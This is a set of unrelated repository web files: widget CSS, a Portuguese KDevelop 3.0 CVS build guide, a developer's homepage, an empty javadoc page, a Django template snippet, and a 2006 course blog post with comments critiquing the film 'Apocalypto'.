.mpc-callout--style_1 .mpc-callout__content p:first-child { margin-top: 0 !important; } .mpc-callout--style_1 .mpc-callout__content p:last-child { margin-bottom: 0 !important; } .mpc-callout--style_1 .mpc-callout__button { display: table-cell; vertical-align: middle; white-space: nowrap; } .mpc-callout--style_1 .mpc-callout__button .mpc-button { vertical-align: bottom; } /* Style 2 */ .mpc-callout--style_2 { text-align: center; } /* Style 3 */ .mpc-callout--style_3 { text-align: center; } /* Style 4 */ .mpc-callout--style_4 { display: table; width: 100%; } .mpc-callout--style_4 .mpc-callout__icon-wrap { display: table-cell; vertical-align: middle; width: 1px; } .mpc-callout--style_4 .mpc-callout__content { display: table-cell; vertical-align: middle; width: 100%; } .mpc-callout--style_4 .mpc-callout__content p:first-child { margin-top: 0 !important; } .mpc-callout--style_4 .mpc-callout__content p:last-child { margin-bottom: 0 !important; } .mpc-callout--style_4 .mpc-callout__button { display: table-cell; vertical-align: middle; white-space: nowrap; text-align: right; } .mpc-callout--style_4 .mpc-callout__button .mpc-button { vertical-align: bottom; } /* Style 5 */ .mpc-callout--style_5 { display: table; width: 100%; } .mpc-callout--style_5 .mpc-callout__content { display: table-cell; width: 40%; text-align: left; vertical-align: middle; } .mpc-callout--style_5 .mpc-callout__content p:first-child { margin-top: 0 !important; } .mpc-callout--style_5 .mpc-callout__content p:last-child { margin-bottom: 0 !important; } .mpc-callout--style_5 .mpc-callout__icon-wrap { display: table-cell; width: 10%; vertical-align: middle; text-align: center; } .mpc-callout--style_5 .mpc-callout__button { display: table-cell; width: 40%; text-align: right; vertical-align: middle; } .mpc-callout--style_5 .mpc-callout__button .mpc-button { vertical-align: bottom; } /* Style 6 */ .mpc-callout--style_6 { text-align: center; } /* Style 7 */ .mpc-callout--style_7 { text-align: center; } /* Style 8 */ .mpc-callout--style_8 .mpc-callout__icon-wrap { float: left; } @media screen and (max-width: 992px) { .mpc-callout__heading, .mpc-callout__description, .mpc-callout__button, .mpc-callout__icon-wrap { text-align: center !important; } .mpc-callout__heading { line-height: 1.25em !important; } .mpc-callout__heading, .mpc-callout__description { max-width: initial !important; } .mpc-callout--style_1, .mpc-callout--style_4, .mpc-callout--style_5, .mpc-callout--style_8 { display: block; } .mpc-callout--style_1 .mpc-callout__icon-wrap, .mpc-callout--style_1 .mpc-callout__content, .mpc-callout--style_1 .mpc-callout__button, .mpc-callout--style_4 .mpc-callout__icon-wrap, .mpc-callout--style_4 .mpc-callout__content, .mpc-callout--style_4 .mpc-callout__button, .mpc-callout--style_5 .mpc-callout__icon-wrap, .mpc-callout--style_5 .mpc-callout__content, .mpc-callout--style_5 .mpc-callout__button, .mpc-callout--style_8 .mpc-callout__icon-wrap, .mpc-callout--style_8 .mpc-callout__content, .mpc-callout--style_8 .mpc-callout__button { display: block; width: 100%; } .mpc-callout--style_1 .mpc-callout .mpc-button, .mpc-callout--style_1 .mpc-callout__icon, .mpc-callout--style_4 .mpc-callout .mpc-button, .mpc-callout--style_4 .mpc-callout__icon, .mpc-callout--style_5 .mpc-callout .mpc-button, .mpc-callout--style_5 .mpc-callout__icon, .mpc-callout--style_8 .mpc-callout .mpc-button, .mpc-callout--style_8 .mpc-callout__icon { margin-left: 0 !important; margin-right: 0 !important; } .mpc-callout--style_1 .mpc-callout__icon, .mpc-callout--style_4 .mpc-callout__icon, .mpc-callout--style_5 .mpc-callout__icon, .mpc-callout--style_8 .mpc-callout__icon { padding-left: 0 !important; padding-right: 0 !important; } .mpc-callout .mpc-button, .mpc-callout__icon-wrap, .mpc-callout__heading, .mpc-callout__description { margin: .5em 0 .5em !important; } .mpc-callout .mpc-divider-wrap .mpc-divider { margin: .25em auto !important; } .mpc-callout--style_7 .mpc-callout__icon-wrap { margin-top: 0 !important; } .mpc-callout--style_5 .mpc-callout__icon-wrap { margin-top: 0 !important; } .mpc-callout--style_5 .mpc-callout__heading { margin-bottom: 0 !important; } }
lang/pt_BR/3.0/branches_compiling.html
KDE/kdev-www
<?php include_file("$k_base_version/cvsbranches.ihtml"); // this is a trick to pass a non-existing path to the include_file() ?> <?php module_head("Instruções para compilar uma versão própria do KDevelop 3.0.x"); ?> Obtenha os fontes do ramo <b>KDE_3_2_BRANCH</b> como indicado acima.<br> <br> Antes de continuar, verifique se o seu computador possui os <a href="index.html?filename=3.0/requirements.html">softwares necessários</a> instalados.<br> <br> Inicie o processo de compilação: <pre> $ cd kdevelop $ make -f admin/Makefile.common cvs-clean $ make -f Makefile.cvs </pre> <?php include_file("3.0/compiling.ihtml"); module_tail(); module_head("Como manter a sua versão atualizada"); ?> <br> Após baixar e compilar com sucesso um dos ramos CVS acima, você deseja mantê-lo atualizado no intuito de conseguir todas as correções. Para evitar digitar todos os comandos que preparam as variáveis de ambiente toda vez que você for atualizar, você pode colocá-los no arquivo .bashrc ou .cshrc, a depender do seu shell.<br> Se você utiliza o shell bash acrescente as seguintes linhas:<br> <pre> export KDEDIR=/onde/seu/kde3/está export QTDIR=/onde/seu/qt3/está export LD_LIBRARY_PATH=$QTDIR/lib:$KDEDIR/lib:$LD_LIBRARY_PATH export LIBRARY_PATH=$QTDIR/lib:$KDEDIR/lib:$LIBRARY_PATH export PATH=$QTDIR/bin:$KDEDIR/bin:$PATH </pre> Se você usa tcsh acrescente as seguintes linhas:<br> <pre> setenv KDEDIR /where/your/kde3/is setenv QTDIR /where/your/qt3/is setenv LD_LIBRARY_PATH $QTDIR/lib:$KDEDIR/lib:$LD_LIBRARY_PATH setenv LIBRARY_PATH $QTDIR/lib:$KDEDIR/lib:$LIBRARY_PATH setenv PATH $QTDIR/bin:$KDEDIR/bin:$PATH </pre> <P> <b>Nota:</b> Por razões óbvias você deve editar as primeiras duas linhas para casar com a sua configuração! :)<br> </p> <br> A seguir vá para o diretório que você colocou os <i>arquivos do kdevelop retirados do CVS</i> e invoque o comando de atualização:<br> <pre> $ cd where_kde3src_is/kdevelop $ cvs update -dP </pre> <br> O próximo passo depende da saída do comando anterior:<br> Se você obtiver parecido algo com:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;U /algum_caminho_de_diretorios/Makefile.am<br> Você deve fazer o seguinte:<br> <pre> $ make -f Makefile.cvs </pre> e então _TODOS_ os passos seguintes.<br> <br> Se você obtiver parecido algo com:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;P /algum_caminho_de_diretorios/Makefile.am<br> Você deve fazer o seguinte:<br> <pre> $ ./configure --enable-debug=full --prefix=$KDEDIR --with-kdelibsdoxy-dir=$KDEDIR/share/doc/HTML/en/kdelibs-apidocs </pre> e então _TODOS_ os passos seguintes.<br><br> <pre> $ make $ make install (como root) </pre> Se por alguma razão o comando <b>make</b> falhar você pode forçá-lo a ignorar erros adicionando a opção <b>-k</b>. A depender da gravidade do erro você terminará com uma versão funcional ou não do kdevelop. Logo, faça o "make -k install" por sua conta e risco!!! De qualquer maneira estes erros costumam desaparecer depois de poucas horas, logo você deve tentar fazer um <b>update</b> novamente mais tarde, antes do perigoso :) comando <b>make install</b>.<br> <pre> $ make -k $ make -k install (como root) </pre> Está feito! Você agora possui a versão mais atualizada do KDevelop. Para iniciá-la é so digitar:<br> <pre> $ kdevelop </pre> Tudo o que você deve fazer para manter esta versão atualizada é repetir estes passos sempre que alguém na lista <a href="index.html?filename=mailinglist.html">kdevelop-devel</a> consertar um <i>bug</i>. <br> Logo você está fortemente encorajado a <a href="index.html?filename=mailinglist.html">participar da lista de mensagens</a>.<br><br><br> Você deve relatar os <i>bugs</i> que encontrar com o <a href="http://bugs.kde.org/wizard.cgi">formulário para envio de <i>bugs</i></a>. Você <b>não deve</b> relatar erros de compilação no <i>banco de bugs</i>. Para erros de compilação utilize a <a href="index.html?filename=mailinglist.html">lista de mensagens</a>.<br> <br> Você pode conferir os <i>bugs</i> no <a href="http://bugs.kde.org/buglist.cgi?product=kdevelop&amp;bug_status=UNCONFIRMED&amp;bug_status=NEW&amp;bug_status=ASSIGNED&amp;bug_status=REOPENED&amp;order=map_components.name,bugs.bug_id"><i>banco de bugs</i></a>.<br> <?php module_tail(); module_head("Como compilar no FreeBSD"); ?><br> Siga as instruções normais, mas utilize o <b>gmake</b> ao invés do <b>make</b>, <pre> $ gmake -f Makefile.cvs </pre> e depois faça: <pre> $ export CXXFLAGS="-L/usr/X11R6/lib -I/usr/local/include/db41 -I/usr/local/include -L/usr/local/lib -I/usr/X11R6/include" </pre> Perceba que você precisa do <b>berkeley db 4.1</b> instalado; se você possui outra versão será preciso ajustar o caminho.<br> Troque a linha "ac_cv_bdb=no" por "ac_cv_bdb=yes" no arquivo <b>configure</b> pois senão este não conseguirá encontrar as bibliotecas <b>db</b>.<br> Para ver qual versão você tem instalada: <pre> $ pkg_info | grep db41 db41-4.1.25_1 The Berkeley DB package, revision 4.1 </pre> Os rapazes do FreeBSD renomearam a <b>libdb.so</b> para <b>libdbxx.so</b>. Logo substitua "-ldb" por "-ldb41" no arquivo <b>lib/catalog/Makefile.am</b><br> Então você pode continuar ao processo normal: <pre> $ ./configure --prefix=/blah --enable-debug=full </pre> <?php module_tail(); ?>
index.html
vjcagay/vjcagay.github.io
<!DOCTYPE html> <html lang="en"> <head> <title>Vincent John Cagay</title> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <link href="https://cdnjs.cloudflare.com/ajax/libs/modern-normalize/1.0.0/modern-normalize.min.css" rel="stylesheet" type="text/css" /> <link href="https://fonts.cdnfonts.com/css/merriweather" rel="stylesheet" /> <link href="https://fonts.cdnfonts.com/css/source-serif-pro" rel="stylesheet" /> <link href="https://fonts.cdnfonts.com/css/opendyslexic" rel="stylesheet" /> <style> :root { --bg-default: #fff; --text-default: #353535; --bg-dark: #353535; --text-dark: #d9d9d9; --hr-default: #d9d9d9; } body { background: var(--bg-default); color: var(--text-default); padding: 0 48px; font-size: 18px; } main { max-width: 960px; margin: 48px auto; } hr { border: none; border-top: 1px solid var(--hr-default); height: 8px; text-align: center; } h1 { font-family: "Merriweather", Georgia, "Times New Roman", Times, serif; /* font-family: "OpenDyslexic"; */ text-align: center; } p { font-family: "Source Serif Pro", Georgia, "Times New Roman", Times, serif; /* font-family: "OpenDyslexic"; */ line-height: 1.5; /* text-align: justify; */ } hr + p::first-letter { font-size: 400%; float: left; margin-right: 16px; } a { color: inherit; } img { width: 128px; filter: grayscale(1); display: block; margin: auto; } @media only screen and (min-width: 768px) { body { display: flex; height: 100vh; } main { margin: auto; padding: 80px 0 16px 0; } img { display: initial; float: left; margin-top: -48px; filter: grayscale(1); } h1 { text-align: right; } } @media (prefers-color-scheme: dark) { body { background: var(--bg-dark); color: var(--text-dark); } } </style> </head> <body> <main> <img src="./me.jpeg" alt="Vincent John Cagay's photo" /> <h1>Vincent John Cagay</h1> <hr /> <p> I am a software engineer with over eight years of experience working in the industry. Most of my work experience involves migrating legacy systems and bring them into the modern age. </p> <p> At the start of my career, I was a full-stack developer that writes back-end code in PHP. When I learned of the existence of Node.js, I realized that someone could write a full-stack application in just JavaScript. Most of my peers were back-end developers, and the front-end was the Wild Wild West of code (and still is today). Nowadays, people use mobile devices, and seeing my code show up on those things made me realize that front-end development could be my focus. </p> <p> While being well-versed in making web applications, I have a keen interest in mobile development. Given enough time, I also make sure the code I produce is of the highest quality — well-tested, scalable, and accessible. </p> <p> Please see some of my work in <a href="https://github.com/vjcagay" title="Link to GitHub" target="_blank" >GitHub</a > and <a href="https://gitlab.com/vjcagay" title="Link to GitLab" target="_blank" > GitLab</a >. You may contact me via <a href="https://www.linkedin.com/in/vjcagay/" title="Link to Linkedin" target="_blank" >Linkedin</a > or <a href="mailto:iam@vjca.gay" title="Vincent John Cagay's email" >email</a >. You may also see my <a href="./resume.pdf" target="_blank" title="Vincent John Cagay's resume in PDF format" >resume</a >. </p> <p> I am from the Philippines, but currently based in Japan. Let us meet when you are here! </p> </main> </body> </html>
calculator/doc/deprecated-list.html
mfacelle/projects
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!--NewPage--> <HTML> <HEAD> <!-- Generated by javadoc (build 1.6.0_65) on Wed Dec 11 17:01:43 EST 2013 --> <TITLE> Deprecated List </TITLE> <META NAME="date" CONTENT="2013-12-11"> <LINK REL ="stylesheet" TYPE="text/css" HREF="stylesheet.css" TITLE="Style"> <SCRIPT type="text/javascript"> function windowTitle() { if (location.href.indexOf('is-external=true') == -1) { parent.document.title="Deprecated List"; } } </SCRIPT> <NOSCRIPT> </NOSCRIPT> </HEAD> <BODY BGCOLOR="white" onload="windowTitle();"> <HR> <!-- ========= START OF TOP NAVBAR ======= --> <A NAME="navbar_top"><!-- --></A> <A HREF="#skip-navbar_top" title="Skip navigation links"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_top_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="calculator/package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <FONT CLASS="NavBarFont1">Class</FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <FONT CLASS="NavBarFont1">Use</FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="overview-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Deprecated</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="index-files/index-1.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;PREV&nbsp; &nbsp;NEXT</FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="index.html?deprecated-list.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="deprecated-list.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_top"></A> <!-- ========= END OF TOP NAVBAR ========= --> <HR> <CENTER> <H2> <B>Deprecated API</B></H2> </CENTER> <HR SIZE="4" NOSHADE> <B>Contents</B><UL> </UL> <HR> <!-- ======= START OF BOTTOM NAVBAR ====== --> <A NAME="navbar_bottom"><!-- --></A> <A HREF="#skip-navbar_bottom" title="Skip navigation links"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_bottom_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="calculator/package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <FONT CLASS="NavBarFont1">Class</FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <FONT CLASS="NavBarFont1">Use</FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="overview-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Deprecated</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="index-files/index-1.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;PREV&nbsp; &nbsp;NEXT</FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="index.html?deprecated-list.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="deprecated-list.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_bottom"></A> <!-- ======== END OF BOTTOM NAVBAR ======= --> <HR> </BODY> </HTML>
common/templates/common/parker.html
amd77/parker
{% extends "common/base.html" %} {% block title %}Parking{% endblock title %} {% block navbar-brand %} <a class="navbar-brand" href="{% url 'inicio' %}"><i class="glyphicon glyphicon-link"></i> {{empresa.nombre}}</a> {% endblock navbar-brand %}
190-2006/node/393/index.html
kfitz/machines
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Mel Gibson goes to Mexico | MS 190: Authorship</title> <meta http-equiv="Content-Style-Type" content="text/css" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut icon" href="../../misc/favicon.ico" type="image/x-icon" /> <style type="text/css" media="all">@import "../../modules/aggregator/aggregator.css";</style> <style type="text/css" media="all">@import "../../modules/node/node.css";</style> <style type="text/css" media="all">@import "../../modules/system/defaults.css";</style> <style type="text/css" media="all">@import "../../modules/system/system.css";</style> <style type="text/css" media="all">@import "../../modules/user/user.css";</style> <style type="text/css" media="all">@import "../../modules/comment/comment.css";</style> <style type="text/css" media="all">@import "../../sites/machines.pomona.edu.190-2006/themes/pushbutton/style.css";</style> </head> <body bgcolor="#ffffff"> <div class="hide"><a href="#content" title="Skip navigation." accesskey="2">Skip navigation</a>.</div> <table id="primary-menu" summary="Navigation elements." border="0" cellpadding="0" cellspacing="0" width="100%"> <tr> <td id="home" width="10%"> <a href="../../index.html" title="Home"><img src="../../sites/machines.pomona.edu.190-2006/themes/pushbutton/logo.png" alt="Home" border="0" /></a> </td> <td id="site-info" width="20%"> <div class='site-name'><a href="../../index.html" title="Home">MS 190: Authorship</a></div> </td> <td class="primary-links" width="70%" align="center" valign="middle"> <ul class="links"><li class="first menu-1-1-2"><a href="http://machines.plannedobsolescence.net" class="menu-1-1-2">kathleen fitzpatrick</a></li> <li class="last menu-1-2-2"><a href="http://sakai.claremont.edu/portal/site/CX_mtg_23932" class="menu-1-2-2">course sakai site</a></li> </ul> </td> </tr> </table> <table id="secondary-menu" summary="Navigation elements." border="0" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="secondary-links" width="75%" align="center" valign="middle"> </td> <td width="25%" align="center" valign="middle"> </td> </tr> <tr> <td colspan="2"><div></div></td> </tr> </table> <table id="content" border="0" cellpadding="15" cellspacing="0" width="100%"> <tr> <td id="sidebar-left"> <div class="block block-block" id="block-block-1"> <div class="title"><h3>About</h3></div> <div class="content"><p><a href="../../index.html">MS 190: Authorship</a> is the course website for the Fall 2006 Media Studies senior seminar at Pomona College in Claremont, California.</p> <p><a href="../../syllabus/index.html">Syllabus</a><br /> <a href="../../taxonomy/term/8/index.html">Class information</a></p> </div> </div><div class="block block-blog" id="block-blog-0"> <div class="title"><h3>Recent blog posts</h3></div> <div class="content"><div class="item-list"><ul><li><a href="../716/index.html">Site Archived</a></li><li><a href="../715/index.html">Another YouTube Phenomenon: &quot;What Do You Love About Music&quot;</a></li><li><a href="../712/index.html">Blog Blahbla</a></li><li><a href="../711/index.html">blog about blogging</a></li><li><a href="../710/index.html">KIDS incorporated</a></li><li><a href="../709/index.html">consumer whores</a></li><li><a href="../708/index.html">HELP STALLONE</a></li><li><a href="../707/index.html">i heart youtube</a></li><li><a href="../706/index.html">COME TO MY WINDOW!</a></li><li><a href="../705/index.html">authorin&#039; is funny times</a></li></ul></div><div class="more-link"><a href="../../blog/index.html" title="Read the latest blog entries.">more</a></div></div> </div><div class="block block-comment" id="block-comment-0"> <div class="title"><h3>Recent comments</h3></div> <div class="content"><div class="item-list"><ul><li><a href="../527/index.html#comment-576">You&#039;ve got it wrong. Yin</a><br />4 years 17 weeks ago</li><li><a href="../527/index.html#comment-575">Do you remember the title of</a><br />4 years 17 weeks ago</li><li><a href="../695/index.html#comment-550">the bubble boy</a><br />4 years 19 weeks ago</li><li><a href="../660/index.html#comment-549">mine&#039;s just a nickname...</a><br />4 years 19 weeks ago</li><li><a href="../694/index.html#comment-548">thats a great song </a><br />4 years 19 weeks ago</li><li><a href="../695/index.html#comment-547">ball and chain</a><br />4 years 19 weeks ago</li><li><a href="../708/index.html#comment-546">it very much depends</a><br />4 years 19 weeks ago</li><li><a href="../700/index.html#comment-545">video fun ya ya</a><br />4 years 19 weeks ago</li><li><a href="../692/index.html#comment-544">hahahaaa the first read</a><br />4 years 19 weeks ago</li><li><a href="../692/index.html#comment-543">oh yeah my original point</a><br />4 years 19 weeks ago</li></ul></div></div> </div> </td> <td valign="top"> <div id="main"> <div class="breadcrumb"><a href="../../index.html">Home</a> » <a href="../../blog/index.html">Blogs</a> » <a href="../../blog/8/index.html">ghostwriter&#039;s blog</a></div> <h1 class="title">Mel Gibson goes to Mexico</h1> <!-- start main content --> <div class="node"> <span class="submitted">Submitted by ghostwriter on 6 November 2006 - 12:34am.</span> <span class="taxonomy"><ul class="links inline"><li class="first taxonomy_term_423"><a href="../../taxonomy/term/423/index.html" rel="tag" title="" class="taxonomy_term_423">indigenous people</a></li> <li class="taxonomy_term_124"><a href="../../taxonomy/term/124/index.html" rel="tag" title="" class="taxonomy_term_124">movies</a></li> <li class="last taxonomy_term_376"><a href="../../taxonomy/term/376/index.html" rel="tag" title="" class="taxonomy_term_376">race</a></li> </ul></span> <div class="content"><p>So tonight I went to see Borat (which I will probably make a whole separate post about) and I saw an interesting preview before the feature presentation. The trailer was for Mel Gibson's new movie "Apocalypto," which comes out in December. After being confused by the trailer I went online when I got home to see what the movie was all about. So basically, it's about the decline of the Maya civilization. The trailer starts with a quote that's something like "A civilization can't destroyed from without until it's weakened from within". I thought that was a little odd, and seemed to be downplaying the effects of colonialism.</p> <p>Other notable things about the film are that all the dialogue is all in an indigenous language and the entire cast is Mexican and/or indigenous. I read an article about Gibson and how he was being awarded by the Latin Business Association for his "vision and courage" in making this movie. Gibson says "It is generally a conceit of filmmakers that history only began with Europeans." It's great that he's using a native language and not casting white people in brownface. But Gibson forgets that it's <em>also</em> generally a conceit of filmmakers that indigenous people in the Americas died out, or that the only stories worth telling about them are those set in a distant, mythologized past. From what I've seen so far, I don't think "Apocalypto" is any exception to that. It's so rare to see representations of contemporary indigenous people, and I question why mainstream Hollywood films tend to cling to the past in this way. </p> <p>The Latin Business Association also commented that they think the movie will challenge the growing anti-Latino rhetoric in the U.S. It's true that there is an anti-Latino sentiment around that stems largely from heated discussions on immigration. But what does it mean to make a film that associates the ancestors of Latino people with the fall of a civilization?</p> <p>I don't know. Maybe I just find everything Mel Gibson does to be suspect because I deeply dislike him. I'll leave you with a Mel quote:</p> <p>"Apocalypto," he said "is not really a Hollywood production. It is a film made by Mexico." </p> <p>And here's the trailer:<br /> http://www.youtube.com/watch?v=uD77YsJCuGU</p> <p>I wanted to post a link to the article but the link is too long and it stretches out my entire post to an annoying length. It should be pretty easy to find on google though.</p> </div> <div class="links">&raquo; <ul class="links inline"><li class="first last blog_usernames_blog"><a href="../../blog/8/index.html" title="Read ghostwriter&#039;s latest blog entries." class="blog_usernames_blog">ghostwriter&#039;s blog</a></li> </ul></div> </div> <div id="comments"><a id="comment-306"></a> <div class="comment"> <h3 class="title"><a href="index.html#comment-306" class="active">apocalypto</a></h3> <div class="submitted">Submitted by msblogger1220 on 6 November 2006 - 9:51pm.</div> <div class="content"><p>I saw that preview as well and was equally confused... it seemed really messed up to me, so I'm glad you felt that way too.<br /> and borat... wow.</p> </div> <!-- BEGIN: links --> <div class="links">&raquo; </div> <!-- END: links --> </div> <a id="comment-307"></a> <div class="comment"> <h3 class="title"><a href="index.html#comment-307" class="active">my hopes</a></h3> <div class="submitted">Submitted by DaLynziiChic on 6 November 2006 - 11:12pm.</div> <div class="content"><p>i hope the word "sugar-tits" is said in the indigenous Mayan language.</p> </div> <!-- BEGIN: links --> <div class="links">&raquo; </div> <!-- END: links --> </div> <div class="indented"><a id="comment-308"></a> <div class="comment"> <h3 class="title"><a href="index.html#comment-308" class="active">a new shtick?</a></h3> <div class="submitted">Submitted by neurotica on 7 November 2006 - 1:56am.</div> <div class="content"><p>is his new signature as an auteur of film, simply just reserecting old languages that are no longer used? a new trademark, like paris hilton saying "that's hot"?</p> </div> <!-- BEGIN: links --> <div class="links">&raquo; </div> <!-- END: links --> </div> <div class="indented"><a id="comment-309"></a> <div class="comment"> <h3 class="title"><a href="index.html#comment-309" class="active">maybe</a></h3> <div class="submitted">Submitted by ghostwriter on 7 November 2006 - 11:22am.</div> <div class="content"><p>Ha, that very well could be. Maybe he'll just continue to go from country to country making overblown "historical" dramas. Only time will tell...</p> </div> <!-- BEGIN: links --> <div class="links">&raquo; </div> <!-- END: links --> </div> </div></div></div> <!-- end main content --> </div><!-- main --> </td> <td id="sidebar-right"> <div class="block block-block" id="block-block-2"> <div class="title"><h3>Links</h3></div> <div class="content"><p>blogs about electronic writing, reading, and publishing:</p> <ul> <li><a href="http://grandtextauto.gatech.edu/" target="_blank">Grand Text Auto</a></li> <li><a href="http://www.futureofthebook.com/blog" target="_blank">if:book</a></li> <li><a href="http://www.jilltxt.net" target="_blank">jill/txt</a></li> <li><a href="http://misc.wordherders.net/" target="_blank">Miscellany is the Largest Category</a></li> </ul> <p></p> <p>other interesting academic blogs:</p> <ul> <li><a href="http://www.michaelberube.com/index.php" target="_blank">Michael Bérubé</a></li> <li><a href="http://bitchphd.blogspot.com/" target="_blank">Bitch, PhD</a></li> <li><a href="http://www.itofisher.com/mito/" target="_blank">Mimi Ito</a></li> <li><a href="http://www.henryjenkins.org/" target="_blank">Henry Jenkins</a></li> <li><a href="http://chutry.wordherders.net/" target="_blank">Chuck Tryon</a></li> <li><a href="http://www.thevalve.org/go" target="_blank">The Valve</a></li> </ul> <p></p> <p>personal blogs everyone should read:</p> <ul> <li><a href="http://www.dooce.com/" target="_blank">Dooce</a></li> <li><a href="http://www.alittlepregnant.com/alittlepregnant/" target="_blank">A Little Pregnant</a></li> <li><a href="http://tinycatpants.squarespace.com/journal/" target="_blank">Tiny Cat Pants</a></li> </ul> <p></p> <p>blogs about authorship, on some level, at least:</p> <ul> <li><a href="http://belledejour-uk.blogspot.com/" target="_blank">Belle de Jour</a></li> </ul> <p><a href="mailto:kfitzpatrickATpomonaDOTedu">suggest a link</a></p> </div> </div> </td> </tr> </table> <table id="footer-menu" summary="Navigation elements." border="0" cellpadding="0" cellspacing="0" width="100%"> <tr> <td align="center" valign="middle"> <div class="primary-links"> <ul class="links"><li class="first menu-1-1-2"><a href="http://machines.plannedobsolescence.net" class="menu-1-1-2">kathleen fitzpatrick</a></li> <li class="last menu-1-2-2"><a href="http://sakai.claremont.edu/portal/site/CX_mtg_23932" class="menu-1-2-2">course sakai site</a></li> </ul> </div> </td> </tr> </table> <div id="footer-message"> <p><a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/2.5/"><img alt="Creative Commons License" border="0" src="http://creativecommons.org/images/public/somerights20.png" /></a><br />This work is licensed under a <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/2.5/">Creative Commons Attribution-NonCommercial-ShareAlike 2.5 License</a>. </p> </div> </body> </html> <!-- Localized -->
RefactoredProject/RefactoredProject/doc/com/CMPUT301W14T13/gpscommentlogger/model/tasks/package-use.html
CMPUT301W14T13/Team13GPSCommentLogger
